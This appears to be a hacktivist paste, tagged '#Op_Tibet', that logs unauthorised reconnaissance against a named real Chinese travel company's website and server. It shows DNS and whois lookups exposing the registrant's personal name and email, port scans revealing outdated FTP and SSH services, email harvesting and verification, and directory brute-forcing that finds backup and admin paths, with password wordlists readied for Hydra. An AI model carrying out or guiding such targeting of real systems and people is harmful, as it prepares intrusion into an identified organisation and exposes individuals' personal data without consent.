blackhat_global

#Penetration_Testing_In_The_Real_World

Jan 29th, 2020 (edited)
  1. /$$ /$$ /$$ /$$ /$$
  2. | $$ | $$ | $$ | $$ | $$
  3. | $$$$$$$ | $$ /$$$$$$ /$$$$$$$| $$ /$$| $$$$$$$ /$$$$$$ /$$$$$$
  4. | $$__ $$| $$ |____ $$ /$$_____/| $$ /$$/| $$__ $$ |____ $$|_ $$_/
  5. | $$ \ $$| $$ /$$$$$$$| $$ | $$$$$$/ | $$ \ $$ /$$$$$$$ | $$
  6. | $$ | $$| $$ /$$__ $$| $$ | $$_ $$ | $$ | $$ /$$__ $$ | $$ /$$
  7. | $$$$$$$/| $$| $$$$$$$| $$$$$$$| $$ \ $$| $$ | $$| $$$$$$$ | $$$$/
  8. |_______/ |__/ \_______/ \_______/|__/ \__/|__/ |__/ \_______/ \___/
  9.  
  10. #Op_Tibet #Tibet #February 2020
  11.  
  12.  
  13. PENETRATION TESTING IN THE REAL WORLD...
  14.  
  15. protonvpn-cli -connect
  16.  
  17. root@blackbox:~# git clone https://github.com/jeanphorn/wordlist.git
  18. root@blackbox:~# cd wordlist/
  19. root@blackbox:~/wordlist# ls
  20. adobe_top100_password.txt passlist.txt router_default_password.md
  21. hydra.restore rdp_passlist.txt ssh_passwd.txt
  22. pass_list.rar README.md usernames.txt
  23.  
  24. TARGET: http://www.etours.cn/
  25. IP ADDRESS: 184.154.192.250
  26.  
  27.  
  28. NSLOOKUP DNS RECORDS A, NS, MX
  29.  
  30. root@blackbox:/# nslookup
  31. > set type=A
  32. > etours.cn
  33. Server: 192.168.1.1
  34. Address: 192.168.1.1#53
  35.  
  36. Non-authoritative answer:
  37. Name: etours.cn
  38. Address: 184.154.192.250
  39.  
  40. > set type=NS
  41. > etours.cn
  42. Server: 192.168.1.1
  43. Address: 192.168.1.1#53
  44.  
  45. Non-authoritative answer:
  46. etours.cn nameserver = ns20.xincache.com.
  47. etours.cn nameserver = ns19.xincache.com.
  48.  
  49. Authoritative answers can be found from:
  50.  
  51. > set type=MX
  52. > etours.cn
  53. Server: 192.168.1.1
  54. Address: 192.168.1.1#53
  55.  
  56. Non-authoritative answer:
  57. etours.cn mail exchanger = 10 mail.etours.cn.
  58.  
  59. Authoritative answers can be found from:
  60. > exit
  61.  
  62.  
  63. DIG DNS RECORDS A, NS, MX
  64.  
  65. root@blackbox:/# dig etours.cn A
  66.  
  67. ; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> etours.cn A
  68. ;; global options: +cmd
  69. ;; Got answer:
  70. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12778
  71. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
  72.  
  73. ;; OPT PSEUDOSECTION:
  74. ; EDNS: version: 0, flags:; udp: 4096
  75. ;; QUESTION SECTION:
  76. ;etours.cn. IN A
  77.  
  78. ;; ANSWER SECTION:
  79. etours.cn. 2586 IN A 184.154.192.250
  80.  
  81. ;; Query time: 1069 msec
  82. ;; SERVER: 192.168.1.1#53(192.168.1.1)
  83. ;; WHEN: Wed Jan 22 13:34:44 CST 2020
  84. ;; MSG SIZE rcvd: 54
  85.  
  86. root@blackbox:/# dig etours.cn NS
  87.  
  88. ; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> etours.cn NS
  89. ;; global options: +cmd
  90. ;; Got answer:
  91. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 21169
  92. ;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1
  93.  
  94. ;; OPT PSEUDOSECTION:
  95. ; EDNS: version: 0, flags:; udp: 4096
  96. ;; QUESTION SECTION:
  97. ;etours.cn. IN NS
  98.  
  99. ;; ANSWER SECTION:
  100. etours.cn. 3506 IN NS ns19.xincache.com.
  101. etours.cn. 3506 IN NS ns20.xincache.com.
  102.  
  103. ;; Query time: 44 msec
  104. ;; SERVER: 192.168.1.1#53(192.168.1.1)
  105. ;; WHEN: Wed Jan 22 13:35:12 CST 2020
  106. ;; MSG SIZE rcvd: 88
  107.  
  108.  
  109. root@blackbox:/# dig etours.cn MX
  110.  
  111. ; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> etours.cn MX
  112. ;; global options: +cmd
  113. ;; Got answer:
  114. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 37222
  115. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
  116.  
  117. ;; OPT PSEUDOSECTION:
  118. ; EDNS: version: 0, flags:; udp: 4096
  119. ;; QUESTION SECTION:
  120. ;etours.cn. IN MX
  121.  
  122. ;; ANSWER SECTION:
  123. etours.cn. 3520 IN MX 10 mail.etours.cn.
  124.  
  125. ;; Query time: 49 msec
  126. ;; SERVER: 192.168.1.1#53(192.168.1.1)
  127. ;; WHEN: Wed Jan 22 13:35:34 CST 2020
  128. ;; MSG SIZE rcvd: 59
  129.  
  130.  
  131. WHOIS DNSLYTICS
  132.  
  133. https://dnslytics.com/whois-lookup/etours.cn
  134.  
  135. WHOIS
  136.  
  137. root@blackbox:/opt# whois etours.cn
  138. Domain Name: etours.cn
  139. ROID: 20040108s10001s00945986-cn
  140. Domain Status: clientUpdateProhibited
  141. Domain Status: clientTransferProhibited
  142. Registrant ID: hr4iv3jdc2gd6
  143. Registrant: 李如勤
  144. Registrant Contact Email: manager@tour-beijing.com
  145. Sponsoring Registrar: 北京新网数码信息技术有限公司
  146. Name Server: ns19.xincache.com
  147. Name Server: ns20.xincache.com
  148. Registration Time: 2004-01-08 15:51:40
  149. Expiration Time: 2029-01-08 15:51:40
  150. DNSSEC: unsigned
  151.  
  152.  
  153. DMITRY IP ADDRESS
  154.  
  155. root@blackbox:/opt# dmitry -winsepfb host 184.154.192.250
  156. Deepmagic Information Gathering Tool
  157. "There be some deep magic going on"
  158.  
  159. HostIP:184.154.192.250
  160. HostName:server.etours.cn
  161.  
  162. Gathered Inet-whois information for 184.154.192.250
  163. ---------------------------------
  164.  
  165.  
  166. inetnum: 180.235.0.0 - 184.255.255.255
  167. netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
  168. descr: IPv4 address block not managed by the RIPE NCC
  169. remarks: ------------------------------------------------------
  170. remarks:
  171. remarks: For registration information,
  172. remarks: you can consult the following sources:
  173. remarks:
  174. remarks: IANA
  175. remarks: http://www.iana.org/assignments/ipv4-address-space
  176. remarks: http://www.iana.org/assignments/iana-ipv4-special-registry
  177. remarks: http://www.iana.org/assignments/ipv4-recovered-address-space
  178. remarks:
  179. remarks: AFRINIC (Africa)
  180. remarks: http://www.afrinic.net/ whois.afrinic.net
  181. remarks:
  182. remarks: APNIC (Asia Pacific)
  183. remarks: http://www.apnic.net/ whois.apnic.net
  184. remarks:
  185. remarks: ARIN (Northern America)
  186. remarks: http://www.arin.net/ whois.arin.net
  187. remarks:
  188. remarks: LACNIC (Latin America and the Carribean)
  189. remarks: http://www.lacnic.net/ whois.lacnic.net
  190. remarks:
  191. remarks: ------------------------------------------------------
  192. country: EU # Country is really world wide
  193. admin-c: IANA1-RIPE
  194. tech-c: IANA1-RIPE
  195. status: ALLOCATED UNSPECIFIED
  196. mnt-by: RIPE-NCC-HM-MNT
  197. created: 2019-01-07T10:49:46Z
  198. last-modified: 2019-01-07T10:49:46Z
  199. source: RIPE
  200.  
  201. role: Internet Assigned Numbers Authority
  202. address: see http://www.iana.org.
  203. admin-c: IANA1-RIPE
  204. tech-c: IANA1-RIPE
  205. nic-hdl: IANA1-RIPE
  206. remarks: For more information on IANA services
  207. remarks: go to IANA web site at http://www.iana.org.
  208. mnt-by: RIPE-NCC-MNT
  209. created: 1970-01-01T00:00:00Z
  210. last-modified: 2001-09-22T09:31:27Z
  211. source: RIPE # Filtered
  212.  
  213. % This query was served by the RIPE Database Query Service version 1.96 (ANGUS)
  214.  
  215.  
  216.  
  217. Gathered Inic-whois information for server.etours.cn
  218. ---------------------------------
  219.  
  220. Gathered Netcraft information for server.etours.cn
  221. ---------------------------------
  222.  
  223. Retrieving Netcraft.com information for server.etours.cn
  224. Netcraft.com Information gathered
  225.  
  226. Gathered Subdomain information for server.etours.cn
  227. ---------------------------------
  228. Searching Google.com:80...
  229. Searching Altavista.com:80...
  230. Found 0 possible subdomain(s) for host server.etours.cn, Searched 0 pages containing 0 results
  231.  
  232. Gathered E-Mail information for server.etours.cn
  233. ---------------------------------
  234. Searching Google.com:80...
  235. Searching Altavista.com:80...
  236. Found 0 E-Mail(s) for host server.etours.cn, Searched 0 pages containing 0 results
  237.  
  238. Gathered TCP Port information for 184.154.192.250
  239. ---------------------------------
  240.  
  241. Port State
  242.  
  243. 21/tcp open
  244. >> 220 ProFTPD 1.3.3e Server (ProFTPD) [184.154.192.250]
  245.  
  246. 22/tcp open
  247. >> SSH-2.0-OpenSSH_4.3
  248.  
  249. 25/tcp open
  250. >> 220 server.etours.cn ESMTP
  251.  
  252. 53/tcp open
  253.  
  254. Portscan Finished: Scanned 150 ports, 145 ports were in state closed
  255.  
  256.  
  257. All scans completed, exiting
  258.  
  259. DMITRY DOMAIN
  260.  
  261. root@blackbox:/opt# dmitry -winsepfb host etours.cn
  262. Deepmagic Information Gathering Tool
  263. "There be some deep magic going on"
  264.  
  265. HostIP:184.154.192.250
  266. HostName:etours.cn
  267.  
  268. Gathered Inet-whois information for 184.154.192.250
  269. ---------------------------------
  270.  
  271.  
  272. inetnum: 180.235.0.0 - 184.255.255.255
  273. netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
  274. descr: IPv4 address block not managed by the RIPE NCC
  275. remarks: ------------------------------------------------------
  276. remarks:
  277. remarks: For registration information,
  278. remarks: you can consult the following sources:
  279. remarks:
  280. remarks: IANA
  281. remarks: http://www.iana.org/assignments/ipv4-address-space
  282. remarks: http://www.iana.org/assignments/iana-ipv4-special-registry
  283. remarks: http://www.iana.org/assignments/ipv4-recovered-address-space
  284. remarks:
  285. remarks: AFRINIC (Africa)
  286. remarks: http://www.afrinic.net/ whois.afrinic.net
  287. remarks:
  288. remarks: APNIC (Asia Pacific)
  289. remarks: http://www.apnic.net/ whois.apnic.net
  290. remarks:
  291. remarks: ARIN (Northern America)
  292. remarks: http://www.arin.net/ whois.arin.net
  293. remarks:
  294. remarks: LACNIC (Latin America and the Carribean)
  295. remarks: http://www.lacnic.net/ whois.lacnic.net
  296. remarks:
  297. remarks: ------------------------------------------------------
  298. country: EU # Country is really world wide
  299. admin-c: IANA1-RIPE
  300. tech-c: IANA1-RIPE
  301. status: ALLOCATED UNSPECIFIED
  302. mnt-by: RIPE-NCC-HM-MNT
  303. created: 2019-01-07T10:49:46Z
  304. last-modified: 2019-01-07T10:49:46Z
  305. source: RIPE
  306.  
  307. role: Internet Assigned Numbers Authority
  308. address: see http://www.iana.org.
  309. admin-c: IANA1-RIPE
  310. tech-c: IANA1-RIPE
  311. nic-hdl: IANA1-RIPE
  312. remarks: For more information on IANA services
  313. remarks: go to IANA web site at http://www.iana.org.
  314. mnt-by: RIPE-NCC-MNT
  315. created: 1970-01-01T00:00:00Z
  316. last-modified: 2001-09-22T09:31:27Z
  317. source: RIPE # Filtered
  318.  
  319. % This query was served by the RIPE Database Query Service version 1.96 (WAGYU)
  320.  
  321.  
  322.  
  323. Gathered Inic-whois information for etours.cn
  324. ---------------------------------
  325. Domain Name: etours.cn
  326. ROID: 20040108s10001s00945986-cn
  327. Domain Status: clientUpdateProhibited
  328. Domain Status: clientTransferProhibited
  329. Registrant ID: hr4iv3jdc2gd6
  330. Registrant: 李如勤
  331. Registrant Contact Email: manager@tour-beijing.com
  332. Sponsoring Registrar: 北京新网数码信息技术有限公司
  333. Name Server: ns19.xincache.com
  334. Name Server: ns20.xincache.com
  335. Registration Time: 2004-01-08 15:51:40
  336. Expiration Time: 2029-01-08 15:51:40
  337. DNSSEC: unsigned
  338.  
  339. Gathered Netcraft information for etours.cn
  340. ---------------------------------
  341.  
  342. Retrieving Netcraft.com information for etours.cn
  343. Netcraft.com Information gathered
  344.  
  345. Gathered Subdomain information for etours.cn
  346. ---------------------------------
  347. Searching Google.com:80...
  348. HostName:www.etours.cn
  349. HostIP:184.154.192.250
  350. HostName:beijing.etours.cn
  351. HostIP:184.154.192.250
  352. Searching Altavista.com:80...
  353. Found 2 possible subdomain(s) for host etours.cn, Searched 0 pages containing 0 results
  354.  
  355. Gathered E-Mail information for etours.cn
  356. ---------------------------------
  357. Searching Google.com:80...
  358. Searching Altavista.com:80...
  359. Found 0 E-Mail(s) for host etours.cn, Searched 0 pages containing 0 results
  360.  
  361. Gathered TCP Port information for 184.154.192.250
  362. ---------------------------------
  363.  
  364. Port State
  365.  
  366. 21/tcp open
  367. >> 220 ProFTPD 1.3.3e Server (ProFTPD) [184.154.192.250]
  368.  
  369. 22/tcp open
  370. >> SSH-2.0-OpenSSH_4.3
  371.  
  372. 25/tcp open
  373. >> 220 server.etours.cn ESMTP
  374.  
  375. 53/tcp open
  376.  
  377. Portscan Finished: Scanned 150 ports, 145 ports were in state closed
  378.  
  379.  
  380. All scans completed, exiting
  381.  
  382.  
  383.  
  384. SHODAN CHECK
  385.  
  386. https://www.shodan.io/host/184.154.192.250/raw
  387.  
  388.  
  389. SEND A GET REQUEST
  390.  
  391. chrome-extension://aejoelaoggembcahagimdiliamlcdmfm/index.html
  392.  
  393. GET / HTTP/1.1
  394. Host: 184.154.192.250
  395.  
  396. HTTP/1.1 200 OK
  397. Date: Wed, 22 Jan 2020 19:57:07 GMT
  398. Server: Apache
  399. X-Powered-By: PleskLin
  400. Connection: close
  401. Transfer-Encoding: chunked
  402. Content-Type: text/html
  403.  
  404. Tel: (+86) 10 67160201 ext 1006, 1007
  405. Fax: (+86) 10 67160150 67160130
  406. Add: 2001-1-1,Linghangguoji, Guangqumen, Dongcheng Dist, Beijing, China<br>
  407. License No.L-BJ-01220
  408.  
  409.  
  410. TEST EMAIL ADDRESS
  411.  
  412. https://dnslytics.com/email-test
  413.  
  414. booking@etours.cn
  415.  
  416. Testing e-mail address: booking@etours.cn
  417. Number of mail server: 1
  418. Mail server Details Status
  419. mail.etours.cn
  420. Checking server mail.etours.cn...
  421.  
  422. Opening up socket to mail.etours.cn... Succes!
  423.  
  424. mail.etours.cn replied:
  425. HELO www.dnslytics.com
  426. (7002.86 ms)
  427. MAIL FROM: <noreply-testing@dnslytics.com>
  428. (7007.18 ms)
  429. RCPT TO: <booking@etours.cn>
  430. (7007.18 ms)
  431. QUIT
  432. (7007.12 ms)
  433. Successful communication with mail.etours.cn assuming OKsuccess
  434.  
  435.  
  436. OK success
  437. Email delivery for booking@etours.cn is successful for all mail servers!
  438.  
  439.  
  440. TRANSLATE REGISTRANT NAME:
  441.  
  442. 李如勤 = Li Ruqin
  443. manager@tour-beijing.com
  444.  
  445.  
  446. EMAIL HARVESTER
  447.  
  448. root@blackbox:/# cd /opt/
  449. root@blackbox:/opt# git clone https://github.com/laramies/theHarvester.git
  450. root@blackbox:/opt# cd theHarvester/
  451. root@blackbox:/opt/theHarvester# pip3 install -r requirements.txt
  452. root@blackbox:/opt/theHarvester# ./theHarvester.py -d etours.cn -l 500 -b all
  453.  
  454. *******************************************************************
  455. * _ _ _ *
  456. * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
  457. * | __| _ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
  458. * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
  459. * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
  460. * *
  461. * theHarvester 3.1.1dev3 *
  462. * Coded by Christian Martorella *
  463. * Edge-Security Research *
  464. * cmartorella@edge-security.com *
  465. * *
  466. *******************************************************************
  467.  
  468.  
  469. [*] Target: etours.cn
  470.  
  471.  
  472. [*] IPs found: 14
  473. -------------------
  474. 8.5.1.33
  475. 34.212.104.30
  476. 45.204.167.102
  477. 50.63.202.16
  478. 52.84.3.40
  479. 52.84.3.100
  480. 52.84.3.239
  481. 52.84.3.252
  482. 52.84.64.42
  483. 104.27.138.30
  484. 104.27.139.30
  485. 124.16.31.152
  486. 154.222.178.247
  487. 184.154.192.250
  488.  
  489. [*] Emails found: 1
  490. ----------------------
  491. tourism@etours.cn
  492.  
  493.  
  494. https://dnslytics.com/email-test
  495.  
  496. Testing e-mail address: tourism@etours.cn
  497. Number of mail server: 1
  498. Mail server Details Status
  499. mail.etours.cn
  500. Checking server mail.etours.cn...
  501.  
  502. Opening up socket to mail.etours.cn... Succes!
  503.  
  504. mail.etours.cn replied:
  505. HELO www.dnslytics.com
  506. (7002.05 ms)
  507. MAIL FROM: <noreply-testing@dnslytics.com>
  508. (7003.72 ms)
  509. RCPT TO: <tourism@etours.cn>
  510. (7007.17 ms)
  511. QUIT
  512. (7004.80 ms)
  513. Successful communication with mail.etours.cn assuming OKsuccess
  514.  
  515.  
  516. OK success
  517. Email delivery for tourism@etours.cn is successful for all mail servers!
  518.  
  519.  
  520.  
  521. [*] Hosts found: 46
  522. ---------------------
  523. beijing.etours.cn:184.154.192.250
  524. c-domain__target--beijing.etours.cn:
  525. c-domain__target--mail.etours.cn:
  526. changdetours.cn:
  527. chinawinetours.cn:184.168.131.241
  528. dragongatetours.cn:104.27.139.30, 104.27.138.30
  529. etours.cn:184.154.192.250
  530. httpacnow.netbeijing.etours.cn:
  531. httpacnow.netwww.etours.cn:
  532. httpbeijing.etours.cn:
  533. httpsseo.5118.combeijing.etours.cn:
  534. httpswww.keyword-suggest-tool.comsearchbeijing.etours.cn:
  535. httpwww.etours.cn:
  536. mail.etours.cn:184.154.192.250
  537. seetours.cn:
  538. server.etours.cn:
  539. taketours.cn:34.212.104.30
  540. www.3etours.cn:122.10.82.47, 103.97.19.67
  541. www.beijing.etours.cn:
  542. www.dragongatetours.cn:104.27.138.30, 104.27.139.30
  543. www.etours.cn:184.154.192.250
  544. www.lovetours.cn:154.222.178.247
  545. www.seetours.cn:2.16.135.32, 2.16.135.42
  546. www.taketours.cn:34.212.104.30
  547.  
  548.  
  549. WHATRUNS 184.154.192.250
  550.  
  551. https://www.whatruns.com/website/etours.cn
  552.  
  553. Hosting Panel
  554. Plesk
  555.  
  556. Programming Language
  557. PHP 5.3.10
  558.  
  559. Web Server
  560. Apache 2.4.6
  561.  
  562.  
  563. WHATWEB
  564.  
  565. root@blackbox:~/WhatWeb# ./whatweb
  566.  
  567. .$$$ $. .$$$ $.
  568. $$$$ $$. .$$$ $$$ .$$$$$$. .$$$$$$$$$$. $$$$ $$. .$$$$$$$. .$$$$$$.
  569. $ $$ $$$ $ $$ $$$ $ $$$$$$. $$$$$ $$$$$$ $ $$ $$$ $ $$ $$ $ $$$$$$.
  570. $ `$ $$$ $ `$ $$$ $ `$ $$$ $$' $ `$ `$$ $ `$ $$$ $ `$ $ `$ $$$'
  571. $. $ $$$ $. $$$$$$ $. $$$$$$ `$ $. $ :' $. $ $$$ $. $$$$ $. $$$$$.
  572. $::$ . $$$ $::$ $$$ $::$ $$$ $::$ $::$ . $$$ $::$ $::$ $$$$
  573. $;;$ $$$ $$$ $;;$ $$$ $;;$ $$$ $;;$ $;;$ $$$ $$$ $;;$ $;;$ $$$$
  574. $$$$$$ $$$$$ $$$$ $$$ $$$$ $$$ $$$$ $$$$$$ $$$$$ $$$$$$$$$ $$$$$$$$$'
  575.  
  576.  
  577. WhatWeb - Next generation web scanner version 0.5.1.
  578. Developed by Andrew Horton (urbanadventurer) and Brendan Coles (bcoles)
  579. Homepage: https://www.morningstarsecurity.com/research/whatweb
  580.  
  581.  
  582. root@blackbox:~# git clone https://github.com/urbanadventurer/WhatWeb.git
  583.  
  584. root@blackbox:~/WhatWeb# ./whatweb -v -a 4 etours.cn
  585.  
  586. WhatWeb report for http://www.etours.cn/
  587. Status : 200 OK
  588. Title : China Travel Service, China Tours, China Travel - China eTours Travel Service
  589. IP : 184.154.192.250
  590. Country : UNITED STATES, US
  591.  
  592. Summary : Script[text/javascript], Meta-Author[www.eTours.cn], HTTPServer[Apache], JQuery[1.4.2], Plesk[Lin], Email[booking@etours.cn], Apache, X-Powered-By[PleskLin]
  593.  
  594. Detected Plugins:
  595. [ Apache ]
  596. The Apache HTTP Server Project is an effort to develop and
  597. maintain an open-source HTTP server for modern operating
  598. systems including UNIX and Windows NT. The goal of this
  599. project is to provide a secure, efficient and extensible
  600. server that provides HTTP services in sync with the current
  601. HTTP standards.
  602.  
  603. Google Dorks: (3)
  604. Website : http://httpd.apache.org/
  605.  
  606. [ Email ]
  607. Extract email addresses. Find valid email address and
  608. syntactically invalid email addresses from mailto: link
  609. tags. We match syntactically invalid links containing
  610. mailto: to catch anti-spam email addresses, eg. bob at
  611. gmail.com. This uses the simplified email regular
  612. expression from
  613. http://www.regular-expressions.info/email.html for valid
  614. email address matching.
  615.  
  616. String : booking@etours.cn
  617. String : booking@etours.cn
  618.  
  619. [ HTTPServer ]
  620. HTTP server header string. This plugin also attempts to
  621. identify the operating system from the server header.
  622.  
  623. String : Apache (from server string)
  624.  
  625. [ JQuery ]
  626. A fast, concise, JavaScript that simplifies how to traverse
  627. HTML documents, handle events, perform animations, and add
  628. AJAX.
  629.  
  630. Version : 1.4.2
  631. Website : http://jquery.com/
  632.  
  633. [ Meta-Author ]
  634. This plugin retrieves the author name from the meta name
  635. tag - info:
  636. http://www.webmarketingnow.com/tips/meta-tags-uncovered.html
  637. #author
  638.  
  639. String : www.eTours.cn
  640.  
  641. [ Plesk ]
  642. Plesk is a web control panel
  643.  
  644. String : Lin
  645. Google Dorks: (1)
  646. Website : http://www.parallels.com/products/plesk/
  647.  
  648. [ Script ]
  649. This plugin detects instances of script HTML elements and
  650. returns the script language/type.
  651.  
  652. String : text/javascript
  653.  
  654. [ X-Powered-By ]
  655. X-Powered-By HTTP header
  656.  
  657. String : PleskLin (from x-powered-by string)
  658.  
  659. HTTP Headers:
  660. HTTP/1.1 200 OK
  661. Date: Thu, 23 Jan 2020 15:47:15 GMT
  662. Server: Apache
  663. X-Powered-By: PleskLin
  664. Connection: close
  665. Transfer-Encoding: chunked
  666. Content-Type: text/html
  667.  
  668.  
  669.  
  670. root@blackbox:/opt# dirb http://184.154.192.250/ /usr/share/wordlists/dirb/common.txt
  671.  
  672. -----------------
  673. DIRB v2.22
  674. By The Dark Raver
  675. -----------------
  676.  
  677. START_TIME: Wed Jan 22 15:18:24 2020
  678. URL_BASE: http://184.154.192.250/
  679. WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
  680.  
  681.  
  682. HTTP STATUS CODES:
  683.  
  684.  
  685. https://miro.medium.com/max/1530/0*BX8QCIGzEMtRvoJN.png
  686.  
  687. CODE - STATUS
  688. 200 - OK
  689. 301 - MOVED PERMANENTLY
  690. 302 - FOUND
  691. 401 - UNAUTHORIZED
  692. 403 - FORBIDDEN
  693. 500 - INTERNAL SERVER ERROR
  694.  
  695.  
  696. -----------------
  697.  
  698. GENERATED WORDS: 4612
  699.  
  700. ---- Scanning URL: http://184.154.192.250/ ----
  701. + http://184.154.192.250/_db_backups (CODE:401|SIZE:1211)
  702. + http://184.154.192.250/admin.pl (CODE:403|SIZE:954)
  703. + http://184.154.192.250/atom (CODE:301|SIZE:0)
  704. + http://184.154.192.250/cgi-bin/ (CODE:403|SIZE:954)
  705. + http://184.154.192.250/favicon.ico (CODE:200|SIZE:0)
  706. + http://184.154.192.250/index.php (CODE:200|SIZE:19887)
  707. + http://184.154.192.250/page1 (CODE:301|SIZE:0)
  708. + http://184.154.192.250/page2 (CODE:301|SIZE:0)
  709. + http://184.154.192.250/php.ini (CODE:200|SIZE:389)
  710. + http://184.154.192.250/plesk-stat (CODE:301|SIZE:301)
  711. + http://184.154.192.250/rdf (CODE:301|SIZE:0)
  712. + http://184.154.192.250/rss (CODE:301|SIZE:0)
  713. + http://184.154.192.250/rss2 (CODE:301|SIZE:0)
  714. + http://184.154.192.250/sitemap.xml (CODE:200|SIZE:78004)
  715. + http://184.154.192.250/usage (CODE:403|SIZE:954)
  716. + http://184.154.192.250/web.xml (CODE:200|SIZE:679)
  717. + http://184.154.192.250/webstat (CODE:301|SIZE:298)
  718.  
  719. ---- Entering directory: http://184.154.192.250/0/ ----
  720. + http://184.154.192.250/0/index.php (CODE:301|SIZE:0)
  721.  
  722. ---- Entering directory: http://184.154.192.250/2011/ ----
  723. + http://184.154.192.250/2011/13 (CODE:200|SIZE:13756)
  724. + http://184.154.192.250/2011/14 (CODE:200|SIZE:13756)
  725. + http://184.154.192.250/2011/15 (CODE:200|SIZE:13756)
  726. + http://184.154.192.250/2011/20 (CODE:200|SIZE:13756)
  727. + http://184.154.192.250/2011/21 (CODE:200|SIZE:13756)
  728. + http://184.154.192.250/2011/22 (CODE:200|SIZE:13756)
  729. + http://184.154.192.250/2011/23 (CODE:200|SIZE:13756)
  730. + http://184.154.192.250/2011/24 (CODE:200|SIZE:13756)
  731. + http://184.154.192.250/2011/25 (CODE:200|SIZE:13756)
  732. + http://184.154.192.250/2011/30 (CODE:200|SIZE:13756)
  733. + http://184.154.192.250/2011/32 (CODE:200|SIZE:13756)
  734. + http://184.154.192.250/2011/42 (CODE:200|SIZE:13756)
  735. + http://184.154.192.250/2011/50 (CODE:200|SIZE:13756)
  736. + http://184.154.192.250/2011/51 (CODE:200|SIZE:13756)
  737. + http://184.154.192.250/2011/64 (CODE:200|SIZE:13756)
  738. + http://184.154.192.250/2011/96 (CODE:200|SIZE:13756)
  739. + http://184.154.192.250/2011/atom (CODE:301|SIZE:0)
  740. + http://184.154.192.250/2011/index.php (CODE:301|SIZE:0)
  741. + http://184.154.192.250/2011/page1 (CODE:301|SIZE:0)
  742. + http://184.154.192.250/2011/page2 (CODE:301|SIZE:0)
  743. + http://184.154.192.250/2011/rdf (CODE:301|SIZE:0)
  744. + http://184.154.192.250/2011/rss (CODE:301|SIZE:0)
  745. + http://184.154.192.250/2011/rss2 (CODE:301|SIZE:0)
  746.  
  747. ---- Entering directory: http://184.154.192.250/2012/ ----
  748. + http://184.154.192.250/2012/13 (CODE:200|SIZE:13756)
  749. + http://184.154.192.250/2012/14 (CODE:200|SIZE:13756)
  750. + http://184.154.192.250/2012/15 (CODE:200|SIZE:13756)
  751. + http://184.154.192.250/2012/20 (CODE:200|SIZE:13756)
  752. + http://184.154.192.250/2012/21 (CODE:200|SIZE:13756)
  753. + http://184.154.192.250/2012/22 (CODE:200|SIZE:13756)
  754. + http://184.154.192.250/2012/23 (CODE:200|SIZE:13756)
  755. + http://184.154.192.250/2012/24 (CODE:200|SIZE:13756)
  756. + http://184.154.192.250/2012/25 (CODE:200|SIZE:13756)
  757. + http://184.154.192.250/2012/30 (CODE:200|SIZE:13756)
  758. + http://184.154.192.250/2012/32 (CODE:200|SIZE:13756)
  759. + http://184.154.192.250/2012/42 (CODE:200|SIZE:13756)
  760. + http://184.154.192.250/2012/50 (CODE:200|SIZE:13756)
  761. + http://184.154.192.250/2012/51 (CODE:200|SIZE:13756)
  762. + http://184.154.192.250/2012/64 (CODE:200|SIZE:13756)
  763. + http://184.154.192.250/2012/96 (CODE:200|SIZE:13756)
  764. + http://184.154.192.250/2012/atom (CODE:301|SIZE:0)
  765. + http://184.154.192.250/2012/index.php (CODE:301|SIZE:0)
  766. + http://184.154.192.250/2012/page1 (CODE:301|SIZE:0)
  767. + http://184.154.192.250/2012/page2 (CODE:301|SIZE:0)
  768. + http://184.154.192.250/2012/rdf (CODE:301|SIZE:0)
  769. + http://184.154.192.250/2012/rss (CODE:301|SIZE:0)
  770. + http://184.154.192.250/2012/rss2 (CODE:301|SIZE:0)
  771.  
  772. ---- Entering directory: http://184.154.192.250/about_us/ ----
  773. + http://184.154.192.250/about_us/admin.pl (CODE:403|SIZE:954)
  774. + http://184.154.192.250/about_us/index.php (CODE:200|SIZE:31320)
  775.  
  776. ---- Entering directory: http://184.154.192.250/ads/ ----
  777. + http://184.154.192.250/ads/admin.pl (CODE:403|SIZE:954)
  778. + http://184.154.192.250/ads/index.php (CODE:301|SIZE:0)
  779.  
  780. ---- Entering directory: http://184.154.192.250/backup/ ----
  781. + http://184.154.192.250/backup/admin.pl (CODE:403|SIZE:954)
  782. + http://184.154.192.250/backup/index.php (CODE:301|SIZE:0)
  783.  
  784. ---- Entering directory: http://184.154.192.250/blog/ ----
  785. + http://184.154.192.250/blog/admin (CODE:302|SIZE:0)
  786. + http://184.154.192.250/blog/admin.pl (CODE:403|SIZE:954)
  787. + http://184.154.192.250/blog/atom (CODE:301|SIZE:0)
  788. + http://184.154.192.250/blog/dashboard (CODE:302|SIZE:0)
  789. + http://184.154.192.250/blog/index.php (CODE:301|SIZE:0)
  790. + http://184.154.192.250/blog/login (CODE:302|SIZE:0)
  791. + http://184.154.192.250/blog/page1 (CODE:301|SIZE:0)
  792. + http://184.154.192.250/blog/page2 (CODE:301|SIZE:0)
  793. + http://184.154.192.250/blog/rdf (CODE:301|SIZE:0)
  794. + http://184.154.192.250/blog/rss (CODE:301|SIZE:0)
  795. + http://184.154.192.250/blog/rss2 (CODE:301|SIZE:0)
  796. + http://184.154.192.250/blog/xmlrpc.php (CODE:405|SIZE:42)
  797.  
  798. ---- Entering directory: http://184.154.192.250/Blog/ ----
  799. + http://184.154.192.250/Blog/atom (CODE:301|SIZE:0)
  800. + http://184.154.192.250/Blog/index.php (CODE:301|SIZE:0)
  801. + http://184.154.192.250/Blog/page1 (CODE:301|SIZE:0)
  802. + http://184.154.192.250/Blog/page2 (CODE:301|SIZE:0)
  803. + http://184.154.192.250/Blog/rdf (CODE:301|SIZE:0)
